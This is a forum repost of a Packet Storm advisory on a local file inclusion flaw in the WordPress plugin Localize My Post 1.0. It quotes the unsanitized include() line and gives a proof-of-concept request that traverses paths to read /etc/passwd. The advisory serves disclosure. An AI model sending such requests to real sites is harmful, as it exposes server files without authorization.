WordPress Localize My Post 1.0 Local File Inclusion

#216
Topic created · 1 Posts · 2 Views
  • WordPress Localize My Post plugin version 1.0 suffers from a local file inclusion vulnerability.
    MD5 | 7f78f65786c6ba92a8df4a1d6aef8f36
    Download

    # Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion  
    # Author: Manuel Garcia Cardenas  
    # Date: 2018-09-19  
    # Software link: https://es.wordpress.org/plugins/localize-my-post/  
    # CVE: N/A  
    # DESCRIPTION  
    # This bug was found in the file: /localize-my-post/ajax/include.php  
    # include($_REQUEST['file']);  
    # The parameter "file" it is not sanitized allowing include local files  
    # To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application.  
    # Local File Inclusion POC:  
    GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd  
    

    Source: packetstormsecurity.com

Log in to reply